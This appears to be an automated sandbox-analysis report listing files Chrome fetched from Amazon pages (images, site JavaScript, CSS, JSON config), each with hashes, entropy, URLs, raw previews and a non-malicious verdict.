                                                                                                                                                                                                        Preview:.PNG........IHDR.....................PLTE..U........M........S.....T.....N.....V..OKPT...RSU...235TUW...*+-.....LLQTMRUJOSUVX..R..P.....Q/04STV,-/MRVgko./3...mrvotx-.0...PRT......rw{!.=015...459FHJ346kptuy}KPSinr...VWYINQx|.IJMGLO..Vz..dhlqvz(4C...XY\OTV......bfjDFH#/>..Q013v{.()+TY\RW[>CF...347$0?X]`Z_clqu.........<AD..M.... "EKNjoshmqQVX.. 78;NPS.'7%&(ABD^cgCDE"#%......%1@...QRV`dh...:?B..Zejn.*:.$4..X>?ATWZLMP..)PQRJLPUZ^..W;;=`ad...JLM..T...Z\_]ad]^a.. LNR058...@EH..&......NOQ......}............ 17<?...deh.........gij..-..$...:ES.........STX......hpz[co0;I..WSTS.....UUXU.....:..U.....iCN\......Q[j..c.......l.......b........7..l......\K?..G..b..^.......k.._..4...SD\stw.....@..$......v~.ejLCQv}.`..josYWYC..R..X...w~Low.urj...Y.....b..D.....Brm{.(...<K1U=2%>z..9.cdU+..Wk.${...}>)G&(4L......n...2... .IDATx..[=n.L.u7A.M@A...H..x.9.....{.e....7.`...D..yU.$=.4.b..c[.,....^.WU..'.?........>w.}{.........n.{........>.o..y?]...7?W?.......l'.........>N.R...)...9.|dy,..}......\9.;.
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 1500x600, components 3
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):56778
                                                                                                                                                                                                        Entropy (8bit):7.934938262224051
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:1536:nh7FZanH7HiKpZrs1FAtf6VPuNoZcA/JYYlbwkjYhodVOJ:nJ6nbHieQFwf6S+Jfb5jcodVOJ
                                                                                                                                                                                                        MD5:6E149124F2A4824702FBDA3D7DFDB326
                                                                                                                                                                                                        SHA1:B78D1F4B31B3D3A5BD15A88AE63632B079CC3B31
                                                                                                                                                                                                        SHA-256:D9752E7362505B16253A021E54F76253D188A9419E910158A96C1030BFE48CC2
                                                                                                                                                                                                        SHA-512:F82A91943ADC07CE9E31F28C373E9C292FED9EE8F8E502C409FAAA8409DDDF778118758CECB83559248AC7A28615FE2B16EA7CC6A3EC6438897A4D9D57AA02DD
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://m.media-amazon.com/images/I/51xcYRwPP0L._SX1500_.jpg
                                                                                                                                                                                                        Preview:......JFIF......................................................................................................................................................X...."..........7.....................................................................~4.................................r.......$...X.`Lr...b....,...%.A..!(.... .`.......>.c.>_0....I.2e.D(J.$.J....;.................................1.....s.3...B=...M..................}.....nCT.. ..XPE...`.X.).......%.p..N..kyn.h.......%$...RS),.C.h...................Q.3.VO............................Om..........1....|....O..=w..We....]........s..zz(.....o........`.....Lr...,......"..X.1...?.~...e..........6...d.........................p.n.U...g.w..a...=.Ga..{..v}..e...u..}..m.\..;...K.W..O.....??}...1|.....\...........O..<~.....Sc..y.......s...?K.b~..l~..p.|....@.H..C....S..d1..i..I..Dd..$.`...{F....d..............#...................A........A.................................b..D+.............q.........u._c.m^.....
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (596)
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):739306
                                                                                                                                                                                                        Entropy (8bit):5.57731338831324
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:6144:iu6Pm2tOPdA7gBQ9DtRqcgNTilgo1Y3vTH9aGauo/m9tfnt8Tc:iTPmE7IQ9DtRqcgMlgo1Y3bHrcWqc
                                                                                                                                                                                                        MD5:92625FD343A9F645D82EDC259581A4A8
                                                                                                                                                                                                        SHA1:FCF8F410E442DA15511CF466CC64CA22A56A233A
                                                                                                                                                                                                        SHA-256:1984A08DA60D84AD88855992B41B4A09EEB44AAD7184234FCBFAE7BA66D98E77
                                                                                                                                                                                                        SHA-512:FEB06843CD59D1B0215F8ABD0D66A7817DF0964F73E75531822695B0F8DD31E18C85274585939D02912C5223D1D6FE49C4C8769792323B85693441BF513F9BF4
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:(function(y){var f=window.AmazonUIPageJS||window.P,p=f._namespace||f.attributeErrors,d=p?p("NavSharedAssets",""):f;d.guardFatal?d.guardFatal(y)(d,window):d.execute(function(){y(d,window)})})(function(y,f,p){(function(d){if(!d.$Nav||d.$Nav._replay){document.createElement("header");var a=function(){this.data={}},c=function(a){c.manager.add(a)};a.arrayAdder=function(a){return function(){this.data[a]=(this.data[a]||[]).concat([].slice.call(arguments));return this}};a.prototype={build:function(a,b){this.data.name=.a;this.data.value=b;this.data.immediate=!1;this.data.process=!0;c.manager.add(this.data)},run:function(a,b){b&&(this.data.name=a);this.data.value=b||a;this.data.process=!0;c.manager.add(this.data)},publish:function(a,b){this.data.name=a;this.data.value=b;c.manager.publish(this.data)},declare:function(a,b){this.data.name=a;this.data.value=b;c.manager.add(this.data)},when:a.arrayAdder("when"),iff:a.arrayAdder("iff"),filter:a.arrayAdder("filter"),observe:a.arrayAdder("observe")};var
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):43
                                                                                                                                                                                                        Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                        MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                        SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                        SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                        SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 226x216, components 3
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):15199
                                                                                                                                                                                                        Entropy (8bit):7.94324162084436
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:384:JswHSeCIfFdcpUIblMymnxPaGR3BM+bHfhneUx4LHlsbyHmxU:PsIfFd9EnmnYGxBhDfhfxglCyHmxU
                                                                                                                                                                                                        MD5:559A55E9AFB2BCF4D35EA7CD25037FD7
                                                                                                                                                                                                        SHA1:70D4E5B4E12D64CBDBA414DEEF2FCCA8B0FA395F
                                                                                                                                                                                                        SHA-256:C9ADB0F5F3F70A6B1A9F3DBA0B6016C77F7FE4F215DD5E49AF3651D1ADE0811C
                                                                                                                                                                                                        SHA-512:88F023BA3AB553EA40A960633507AF61E7E47C9A923CD51EBC5FD4690F6B501261B332F9EE8680476A77612A5B3069CABC3B40DA944EBBF7C961FF557191C174
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:"https://m.media-amazon.com/images/I/912+P-6LIYL._AC_SF226,226_QL85_.jpg?aicid=discounts-widgets-horizonte"
                                                                                                                                                                                                        Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."..........4..................................................................0..q.]kg.6...s4..,v..h%....8.-z.4....9U.5...5Iy..Z.t9..=(.@..#.fxsh.|.[..9....!j.>M..A..2....|..45...*P?..TM.|Q.V.eh?..k).s.9.KPv7Nz.........../s]h:.....`.]....+.y:>...ZbK...=...e y..A.z.sK.)^..M..s......G.9.....k. ..ru.n.....6....V..=`... c}.2...t.F..b....-Z..I.......0.$.Ani..Q<.Q...[..S+..((:H.m...."v..l.:.}.. .a.P=&..nR..#....k....=......Lv\.>..Z9.. .$......6.q,fx.4f.cM.=.k.[..i......^ N...;....(.GjVaPU...|.%.h..L.[Qi.B>...|....8...|..4v%..w.d...r.[O..JS9.e#j....O..I.....U0).*6..a+..o..b6..Y.i...?.;...F.f.j.(.rW.C)..4..$+mF.H.bgU..W...rM.M]..U}G2F...c.]..(....Jf6w$N.#h4s.e.pNZ...R]....1..Z.......j.U&\....+x...&.y.A5.v....".,.X....xAH.*.W.y..........d.6.z.EK...)=..b...E...#.....=.tZ..u.7...0.....)..!".,..}.
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):3872
                                                                                                                                                                                                        Entropy (8bit):4.401635005544287
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:48:AMHaubkbWBp30kbtxwOjWzHdEjMvUcbuV6qxvaRb:vtvBd04Wz92qDuV6evaRb
                                                                                                                                                                                                        MD5:AA37F93E3E73F2178BF82DEB44F4FE8F
                                                                                                                                                                                                        SHA1:D111A59E726422D396E700E2232268350F5AE50C
                                                                                                                                                                                                        SHA-256:B9CBDABD491B252B7D79A933B276174FE1083363CB5F4EF5729CE18159B6520C
                                                                                                                                                                                                        SHA-512:F10EE525362065DA52116EB74A4C9B7FCE631379BC83B82B6A98358C41C00A48AC99C1F0917078ADAF49EE0D5BFAA5CC7C579B152ACD7FEE6B5053EF1A591915
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:{. "version": "v1",. "root": {. "static": "https://d2h8zr0m6mus4x.cloudfront.net/primesignup",. "dynamic": "/wlp/prime". },. "domain": {. "us": "https://www.amazon.com",. "uk": "https://www.amazon.co.uk",. "ca": "https://www.amazon.ca",. "de": "https://www.amazon.de",. "es": "https://www.amazon.es",. "fr": "https://www.amazon.fr",. "it": "https://www.amazon.it",. "jp": "https://www.amazon.co.jp",. "in": "https://www.amazon.in",. "cn": "https://www.amazon.cn",. "sg": "https://www.amazon.com.sg",. "mx": "https://www.amazon.com.mx",. "ae": "https://www.amazon.ae",. "br": "https://www.amazon.com.br",. "nl": "https://www.amazon.nl",. "au": "https://www.amazon.com.au",. "tr": "https://www.amazon.com.tr",. "sa": "https://www.amazon.sa",. "se": "https://www.amazon.se",. "pl": "https://www.amazon.pl",. "eg": "https://www.ama
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 240x220, components 3
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):5483
                                                                                                                                                                                                        Entropy (8bit):7.846843317049303
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:TEGI8fM8pwrbkCvxbS2C4h4lukRWI8k2bDkKCjqJohRWklnP7BOQfmOoEuI1F7:oGI8fRpuk0M2Ul55aQK+dfWklPwQuz2
                                                                                                                                                                                                        MD5:D500B923B90613D228091EE693B19D3F
                                                                                                                                                                                                        SHA1:6A8FDA352ECCDAFA8D86CA1B111BB8CFD7C14A3D
                                                                                                                                                                                                        SHA-256:4A7DCB5A795B7C87F2FC73AB5A7821FFCCDD72FF15851CA8F0FFCE2519826D4B
                                                                                                                                                                                                        SHA-512:EC08F8499A35C68ECF94D885AB34273A5C33BDB0C7839A7DD52C1A81C030BBD259CAD76B50D1D3987E0F0303EF7075EDEFC4DB130330D67488E8EE6F8ED9643D
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:"https://m.media-amazon.com/images/I/31+4pNVeyCL._SR240,220_.jpg"
                                                                                                                                                                                                        Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."..........4.................................................................X...........@......n....uUj.-...m[6.o...B/v..R.a.H...l....f.z.@....F..^'E.....q.z..n..Y.H..([n0L.t99H...hWx.0.....&..Z'D(....."........aK.Q....W.W);GU.3.......t....n..+.(E...m.n8....\2.9p...O.I..k......)U.u.?8.Q..R.Z)B.>.#W.F.&)...q...%mmO.......+.:.......)F...n.o..G..d.#...~.D..........4..[...R4z.x.h. ..C..}..!..hf#......3...;,....9...Q.<-.uC..N......,..7.^........0....^..y..q..>1>.s.t.^3@....'...J.}..kC....9.^m...Q...k..9l...g6.w..ezg..r..=Y...~.3.....@.....uVk..r..2*8...h......C..$.....Xr"D.P<..91:yl&)C...L.h..9=..5...i.cx.8...#nb8M2.#.../.de<.8fOk..2.W|...J.eW.u./..J..o..X.W|U....../c>G..d(.7.."..'.Z..Xd..;.....5v....<.^q.^X.'k.n.W0.3...............-.........................13... 0A.!2"PQ#$@a............)....
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 186x116, components 3
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):2473
                                                                                                                                                                                                        Entropy (8bit):7.694727786644825
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:48:q0fVkQpFW8IAgv+lExW/kMGnZu38hk8j8FFfILk63v:JNkj8rgvO1cMGnZk8hk8j0ILkY
                                                                                                                                                                                                        MD5:74CF3C6B6B3207BD1221C0982A440C5A
                                                                                                                                                                                                        SHA1:C4BBCDB3EA6A5A3934FBD66A4DF0F56988E090D0
                                                                                                                                                                                                        SHA-256:4739E0E18F4ED30A1D48BFD581C39F49ECA0E88F3BAA2E56EF7B987839058E7C
                                                                                                                                                                                                        SHA-512:1D5F69D2E05C9B0C10ED03E5BAABC7D2CECCB35EA483F8EE33EBB972FE423A66992C1CFBE8EFFA1E767F51EAC56B34563BEBDD2F6184F8CF579E6CC6829ED42F
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://images-eu.ssl-images-amazon.com/images/G/39/AHS_UAE/2024/UDS/GW/QC/Furniture/XCM_CUTTLE_1690813_3610035_186x116_1X_en_AE._SY116_CB582137121_.jpg
                                                                                                                                                                                                        Preview:......JFIF......................................................................................................................................................t...."..........7..............................................................................f./.X/?O.........j.3%a.......R[.,^..7^T...d./4..W].u..s.2..'w..z...WEY..9..wfQW...fEN..........{...>w.kgu?.......7.G}O.1!......*...,..PO.....s.....FeeYA$n../.A.lw.H..|.K..^].g.....O...gD.a.y.ZW.......8q;........8.[wS3}..:.0i....y.=..y....g.F.I...F..mp..8......5......o.....,.Nz.:..........b.H.......9.!....WVx.js ...................?........................#3..CSs$0....4ct.....@D.de... 'PTq...........?...$u2.<E.h.cA.. .......6.......x...:)^p.^..X...p%.%.WKt/-.....*. .z...b...e.$".....-..E....uQ..i...k...u...]..2.:.C.$.e..7.....I?.m.+. ...........%d.J..l.N..............d.@C.b....el......tKc..j.Z.l..[..........>..ll..h.g#.....c$....I...)D.q..c.h..."...Y.$"...B...]/...D.W.N..[V.R...X.X...\.lG..b..w...%....{(....%.xc
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 480x440, components 3
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):10486
                                                                                                                                                                                                        Entropy (8bit):7.850239289796459
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:192:Aebica+zf52Yc5sYBvLuiwLYAAN2315gMzbdjNnDTiHLzB0BSPF7gJU6R0Ah:ZbPBL52YB3y2FmMfTDOHBd7F6vh
                                                                                                                                                                                                        MD5:D9119D9BD2D2DCAC171E26D38FFC3C80
                                                                                                                                                                                                        SHA1:1C46A27BA75301E61F5F6A49614DB45C3A686353
                                                                                                                                                                                                        SHA-256:0703A843E6C7A5811E3FDC5356354FAABC03202AFC0065CA083055919BD7F9BF
                                                                                                                                                                                                        SHA-512:AD08C7A8339CA633B682D60B497E1E6AD3883C92CEB71C463E74A69B4BFA326C9E3887DA6BAE2E459D5A3C3751E247720879911E794D2A2EB68BEE93DD4F511E
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:"https://m.media-amazon.com/images/I/317JiGToz-L._SR480,440_.jpg"
                                                                                                                                                                                                        Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."..........6..........................................................................................................................p9p9p9p9p9q..................<.v....$~$.1..~.v..|kgk?0}..>.....V.Tn.Z.6..f6..D./?a....h..Ujf.Lr$............k..:........4....\L.m......A.&..v..]2.........M..x.7.).?...f4..;om9.:.w.]....F...L.............1n..G../...k;....2....V.vH....5..^_......Zdk.Z.s|`...k...].U..5...2.vtIjF.j..^.C...........1...ZO.2.q#v~....m.>]..2m.h.hf..m......j.&_.y.dU..D..Uh.\J.Y.`.h.{.v....H.j..k..k.............5./.O.g.......;.1..W5..dX0Z.....[r-....g..[..R:}]......W4sh.U.oY..1*.;.._..Y...@.@..........K.."..#$.E.@.&.N..{..N....{.F+..+^&..^.&........^.Rw....J.U.n..cX..Tv.....(...........#....*.........>q.sh.k.>.$..k.k.\...c....|2.qR....;~~.Wb.}9]Q......8}Di@.........0Y.vF-..S
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, Exif Standard: [TIFF image data, little-endian, direntries=1], baseline, precision 8, 1940x500, components 3
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):94765
                                                                                                                                                                                                        Entropy (8bit):7.824630868878005
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:1536:XElaBISdmlRU+Zk3lvkved+DAMlfPt0sjyZw9vA0ZIe8nKVUvb9Zm:AaBI9gfd+E8PuuUuxZlyZI
                                                                                                                                                                                                        MD5:523FBB27B5717D668DB3E968E1D8E08F
                                                                                                                                                                                                        SHA1:FD6B3457368C115A7B64E18F8A41E2803005AB68
                                                                                                                                                                                                        SHA-256:4F5715CF25A08B349C1A01028C95FF3C670D9DA4289C92D8DF0920F0956F420E
                                                                                                                                                                                                        SHA-512:F7BD222AD03570E1B9C30488D6BF061BE0059CF1C3EC2D5328585C45248F7893518FDD94FBC18975A72C26B45436B973E5FC8C742505D0DD692E72BEE211E88B
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:......JFIF.............JExif..II*.......i.........................,...............Version 1.0.0....C....................................................................C......................................................................................................................b...........................!1.AQa.."2q.B....#Rbr...37su.......$6Cc45St....%DTUV.......&8.....(..................................A........................!1.2AQa.."q...BR....#3br....$......CSs.............?...r.........................................................................................................................................................................................................................................................................................@@@@A........................................................................................................................................................................................................................
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (657)
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):59872
                                                                                                                                                                                                        Entropy (8bit):5.423893338414905
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:768:H/ljDE8qpS8Ik2ajEUt+XuABZ5WBhw/Ji0nEFltdYaGGChCbXf+QRqxw3FqwcE:HtjzTPkT9+Xu0/Ji0nQYrg
                                                                                                                                                                                                        MD5:B09F2B19E47B13B280F94DB002733607
                                                                                                                                                                                                        SHA1:097E1AA36F6D144808EFF3EEA8C513C60F523D03
                                                                                                                                                                                                        SHA-256:6C2EBC2D8EE36D2A945AD08DFEB9FA674DB06600027C393E8778D01B178A7B82
                                                                                                                                                                                                        SHA-512:80CE4FF55F3367CD1021DC195DEE40367A9F15B1756F3B100307E0F76003D8971A45FDD0EC0BE16CBD356B330E18617C1A0D04E30FAABD98D7061B01E9ACB275
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://images-eu.ssl-images-amazon.com/images/I/51nOf57McXL.js?AUIClients/IdentityJsCommonAssets
                                                                                                                                                                                                        Preview:(function(A){var k=window.AmazonUIPageJS||window.P,q=k._namespace||k.attributeErrors,y=q?q("IdentityJsCommonAssets",""):k;y.guardFatal?y.guardFatal(A)(y,window):y.execute(function(){A(y,window)})})(function(A,k,q){var y="function"===typeof Symbol&&"symbol"===typeof Symbol.iterator?function(q){return typeof q}:function(q){return q&&"function"===typeof Symbol&&q.constructor===Symbol&&q!==Symbol.prototype?"symbol":typeof q};(function(){function z(b){var c=I[b];if(c!==q)return c.exports;c=I[b]={exports:{}};.A[b](c,c.exports,z);return c.exports}var A={5276:function(b,c,a){function d(a,b){var c=Object.keys(a);if(Object.getOwnPropertySymbols){var l=Object.getOwnPropertySymbols(a);b&&(l=l.filter(function(b){return Object.getOwnPropertyDescriptor(a,b).enumerable}));c.push.apply(c,l)}return c}function f(a){for(var b=1;b<arguments.length;b++){var c=null!=arguments[b]?arguments[b]:{};b%2?d(Object(c),!0).forEach(function(b){(0,l.default)(a,b,c[b])}):Object.getOwnPropertyDescriptors?Object.definePro
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 186x116, components 3
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):3766
                                                                                                                                                                                                        Entropy (8bit):7.7570509651513175
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:Fvit+C18JhHQwIDh7Chv2DGzQDwRNeqzA:Fvir1uHoDh7akGzQURIq0
                                                                                                                                                                                                        MD5:D336EA2BC81A9C2A232D3FE1C6EB527A
                                                                                                                                                                                                        SHA1:5843525703D25C4A794D32F18116B28E736E8D82
                                                                                                                                                                                                        SHA-256:F118F952DE01D1CE2B68CA2A63AFABA1EA19299274C6A470A3325D3D9F00AEA7
                                                                                                                                                                                                        SHA-512:15A210BCEEC24F85A6EA75B887FA9BA4B4183EEB0C8DE7EC3F6753AC494A2FAEE2E2407E2589BEBFCFAA71BCB607A6C7DE6E314EA46B5D91FC96AD234FAAB34A
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:......JFIF......................................................................................................................................................t...."..........:.........................................................................b.............z...v.=.l9.Pi.h]..o.:F......b.....@.....}C-. .}........X......L....".X(-\X......>u../....~oX....;...d.....#.Zb7>=.~.p......'........D../..F.........h..3..._..Z..#.R...\,|v.......k...z.s ...^.nf..efd..[..g....i..@........5..w.....7H.,.SF..d.`................P.............................!%E..145DUe.$&06AQVqu..'@FGa.........Pf...."gtv..........?......aEYT.)R..%.....o7.%..6I.V.x........F.(.G...8....A...B6Y...ezr..+.B..a...z...iW.......Z9?.hV|bINa....%d<...K-.d....r...yF.mLfC.H.Cm}.|z...0..m....p..7Z4...).....I.%TH...P.B..%.\G..:8.R..GV..,E......j..&j.....$.\.9<.9..Q.....b.<.....)./ZN..p..<.m.O....2.._.O..!O.z>..%..L..6.i2......P....U.#.|...6...2.1...c..]..!:.U....,.Ek%...h.*..$.Nq{(.h.`$.t.w..0..
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):43
                                                                                                                                                                                                        Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                        MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                        SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                        SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                        SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://fls-eu.amazon.ae/1/batch/1/OP/A2VIGQ35RCS4UG:258-1179333-9864664:646E5TEYAMSGQRNCHWPV$uedata=s:%2Frd%2Fuedata%3Fat%26v%3D0.295223.0%26id%3D646E5TEYAMSGQRNCHWPV%26m%3D1%26sc%3Dcsa%3AendVL%26pc%3D15082%26at%3D15082%26t%3D1723729109596%26csmtags%3DendVL%26pty%3DLanding%26spty%3DBrowsePage%26pti%3D30082653031%26tid%3D1GXSAVZ7MBDVTNT0VYNB%26aftb%3D1%26lob%3D1:15082
                                                                                                                                                                                                        Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):43
                                                                                                                                                                                                        Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                        MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                        SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                        SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                        SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (6246), with no line terminators
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):6246
                                                                                                                                                                                                        Entropy (8bit):4.955905351879632
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:48:RtT2uW9WUyn55m28wK1Jwjy78NrGfcRTeYHrYvyDN/Pih2ls8tuYZ3:P6YDRNM4iYHrYvWN3ihMs8d
                                                                                                                                                                                                        MD5:7BCB6C2622F982D0FECC3B3E45541EC3
                                                                                                                                                                                                        SHA1:2A5833FCA90B81168809F0BD2F0E1C067A35A6AD
                                                                                                                                                                                                        SHA-256:C29412F5517BC556A5A4EA946B7AEBAD1DDC1D4B442377327A7E9C45BE3E3274
                                                                                                                                                                                                        SHA-512:B3281E469BBBF05C365004F4280FCA4A36189540BC2783E7CBEDC7741E1E13C01E13A7806873A021FCA4D06C7AC3813C6A95FFB204CC5CACF8FAE21C0CE7ED8E
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://images-eu.ssl-images-amazon.com/images/I/21RZgaOpsqL.css?AUIClients/QuantitySelectorAssets
                                                                                                                                                                                                        Preview:.qs-widget-container{font-family:"Amazon Ember",Arial,sans-serif!important;line-height:19px!important}.qs-widget-checkbox-hidden:active+.qs-widget-container{visibility:hidden}.qs-widget-checkbox-hidden:active+.qs-widget-container>.qs-widget-spinner{visibility:visible}.qs-widget-hidden{visibility:hidden}.qs-widget-visible{visibility:visible}.qs-widget-disable{opacity:.33;overflow:hidden!important}.qs-widget-spinner{position:absolute}.qs-widget-table{border-collapse:collapse;table-layout:auto;margin:0!important;border:0;width:auto}.qs-widget-footer-container{border:0;padding:0;text-align:left}.qs-widget-price{font-weight:700}.qs-widget-dropdown-container{z-index:16777271}.dropdown-ux-refresh.qs-widget-quantity-container{padding:12px;border:1px #d5d9d9 solid;border-radius:4px 4px 0 0;background-color:#fff}.dropdown-ux-refresh.qs-widget-summary-container{padding:8px 12px 12px;border:1px #d5d9d9 solid;border-top:0;border-radius:0 0 4px 4px;background-color:#f0f2f2}.dropdown-ux-refresh .qs-w
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (42564)
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):42614
                                                                                                                                                                                                        Entropy (8bit):5.343120598013134
                                                                                                                                                                                                        Encrypted:false
